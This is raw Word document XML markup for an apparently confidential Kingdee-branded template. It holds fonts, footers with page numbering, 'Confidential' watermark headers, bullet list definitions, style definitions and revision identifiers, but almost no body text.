          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005D3D">
        <w:rPr>
          <w:rFonts w:ascii="Metric Light" w:hAnsi="Metric Light" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidRDefault="007A5775" w:rsidP="00E413A6">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidSect="00B07B2B">
      <w:headerReference w:type="even" r:id="rId29"/>
      <w:headerReference w:type="default" r:id="rId30"/>
      <w:footerReference w:type="even" r:id="rId31"/>
      <w:footerReference w:type="default" r:id="rId32"/>
      <w:headerReference w:type="first" r:id="rId33"/>
      <w:footerReference w:type="first" r:id="rId34"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1558" w:bottom="993" w:left="156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15F8" w:rsidRDefault="006915F8" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006915F8" w:rsidRDefault="006915F8" w:rsidP="006C23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etric Light">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317E" w:rsidRDefault="0038317E">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162F" w:rsidRDefault="006C162F" w:rsidP="006C162F">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00005D3D">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00005D3D">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>7</w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="006C162F" w:rsidRDefault="006C162F">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317E" w:rsidRDefault="0038317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15F8" w:rsidRDefault="006915F8" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006915F8" w:rsidRDefault="006915F8" w:rsidP="006C23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2934" w:rsidRDefault="006915F8">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49360" o:spid="_x0000_s2051" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251658240;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidential"/>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237E" w:rsidRDefault="006915F8" w:rsidP="0038317E">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:ind w:firstLineChars="3900" w:firstLine="7020"/>
      <w:jc w:val="righ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49361" o:spid="_x0000_s2052" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251657216;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidential"/>
          <w10:wrap anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00624C0C">
      <w:rPr>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>③秘密信息 严禁泄露</w:t>
    </w:r>
    <w:r w:rsidR="00400747">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>23495</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-178435</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1343025" cy="319405"/>
          <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="1" name="图片 3" descr="说明: F:\各种logo\kingdee.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说明: F:\各种logo\kingdee.wmf"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1343025" cy="319405"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525">
                    <a:noFill/>
                    <a:miter lim="800000"/>
                    <a:headEnd/>
                    <a:tailEnd/>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2934" w:rsidRDefault="006915F8">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49359" o:spid="_x0000_s2050" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251659264;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidential"/>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654A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C5AB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FB5E48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DEC3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8B09F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4907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8310F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED44F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0428FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7AA2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C46A3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EAE1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D94EEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAA6A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764538"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="480E9F9C"/>
    <w:lvl w:ilvl="0" w:tplc="9FAE883E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="181A09B8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="22B6FA34" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4E54718C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7B4A5C12" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8F2E499E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8F9615DA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BCD27644" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9312AD44"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8EC393E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DA4A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D7848F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16EE1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1344E22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CCE8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2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="3"/>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D5575"/>
    <w:rsid w:val="00005D3D"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="001A657E"/>
    <w:rsid w:val="002176D3"/>
    <w:rsid w:val="00225B8A"/>
    <w:rsid w:val="002A2E7C"/>
    <w:rsid w:val="002C5BA6"/>
    <w:rsid w:val="002D068E"/>
    <w:rsid w:val="00325BC1"/>
    <w:rsid w:val="0038317E"/>
    <w:rsid w:val="003D32A9"/>
    <w:rsid w:val="003D5531"/>
    <w:rsid w:val="003E226D"/>
    <w:rsid w:val="00400747"/>
    <w:rsid w:val="00425416"/>
    <w:rsid w:val="00460887"/>
    <w:rsid w:val="0048668C"/>
    <w:rsid w:val="004902B7"/>
    <w:rsid w:val="004D2956"/>
    <w:rsid w:val="004F36AF"/>
    <w:rsid w:val="00502B5B"/>
    <w:rsid w:val="00544DF6"/>
    <w:rsid w:val="00553603"/>
    <w:rsid w:val="005630F4"/>
    <w:rsid w:val="00570DCC"/>
    <w:rsid w:val="00577A0F"/>
    <w:rsid w:val="00590E32"/>
    <w:rsid w:val="005D008F"/>
    <w:rsid w:val="00600EBB"/>
    <w:rsid w:val="00624C0C"/>
    <w:rsid w:val="00651892"/>
    <w:rsid w:val="006534F4"/>
    <w:rsid w:val="00665F57"/>
    <w:rsid w:val="00672EFB"/>
    <w:rsid w:val="00682934"/>
    <w:rsid w:val="006915F8"/>
    <w:rsid w:val="006B05C6"/>
    <w:rsid w:val="006C162F"/>
    <w:rsid w:val="006C237E"/>
    <w:rsid w:val="006F71F9"/>
    <w:rsid w:val="00725C1A"/>
    <w:rsid w:val="00751A9D"/>
    <w:rsid w:val="00752689"/>
    <w:rsid w:val="0077437D"/>
    <w:rsid w:val="00790BA7"/>
    <w:rsid w:val="007971E2"/>
    <w:rsid w:val="007A5775"/>
    <w:rsid w:val="007D15BA"/>
    <w:rsid w:val="007D6EBD"/>
    <w:rsid w:val="00827EE3"/>
    <w:rsid w:val="00851504"/>
    <w:rsid w:val="008A1490"/>
    <w:rsid w:val="00927492"/>
    <w:rsid w:val="0096380B"/>
    <w:rsid w:val="00984F48"/>
    <w:rsid w:val="009C247C"/>
    <w:rsid w:val="009F2DF3"/>
    <w:rsid w:val="00A2053C"/>
    <w:rsid w:val="00A218A1"/>
    <w:rsid w:val="00A22B26"/>
    <w:rsid w:val="00A52109"/>
    <w:rsid w:val="00A82D97"/>
    <w:rsid w:val="00B07B2B"/>
    <w:rsid w:val="00B36581"/>
    <w:rsid w:val="00B44B7F"/>
    <w:rsid w:val="00BD72E3"/>
    <w:rsid w:val="00BE1662"/>
    <w:rsid w:val="00C07C43"/>
    <w:rsid w:val="00C23E71"/>
    <w:rsid w:val="00C3015C"/>
    <w:rsid w:val="00C33EAA"/>
    <w:rsid w:val="00C6429D"/>
    <w:rsid w:val="00CB1951"/>
    <w:rsid w:val="00CC0917"/>
    <w:rsid w:val="00CD5575"/>
    <w:rsid w:val="00D030F1"/>
    <w:rsid w:val="00D66129"/>
    <w:rsid w:val="00E35061"/>
    <w:rsid w:val="00E413A6"/>
    <w:rsid w:val="00E47828"/>
    <w:rsid w:val="00E87BF5"/>
    <w:rsid w:val="00E924F7"/>
    <w:rsid w:val="00EA12FD"/>
    <w:rsid w:val="00EB409A"/>
    <w:rsid w:val="00EC5F7C"/>
    <w:rsid w:val="00EF2F93"/>
    <w:rsid w:val="00F2316B"/>
    <w:rsid w:val="00F31DD5"/>
    <w:rsid w:val="00F552D7"/>
    <w:rsid w:val="00F66A55"/>
    <w:rsid w:val="00F7226B"/>
    <w:rsid w:val="00F94971"/>
    <w:rsid w:val="00FA41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chartTrackingRefBased/>
  <w15:docId w15:val="{21F93C3B-1575-4A2A-9836-888195A8B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B05C6"/>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C237E"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="页眉 Char"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C237E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注框文本 Char"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006C237E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0048668C"/>
    <w:rPr>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="CC0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C33EAA"/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="username">
    <w:name w:val="username"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00005D3D"/>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00005D3D"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00005D3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="local-date">
    <w:name w:val="local-date"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00005D3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="local-time">
    <w:name w:val="local-time"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00005D3D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00005D3D"/>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7794854">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="322048498">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="226573153">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="181209994">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="450"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="161004382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45308948">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1562785674">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1562252665">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="355935377">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="856386728">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="467402887">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="105"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1034188198">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="159528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4037843">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1089042318">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="134"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1145781856">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1580215985">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
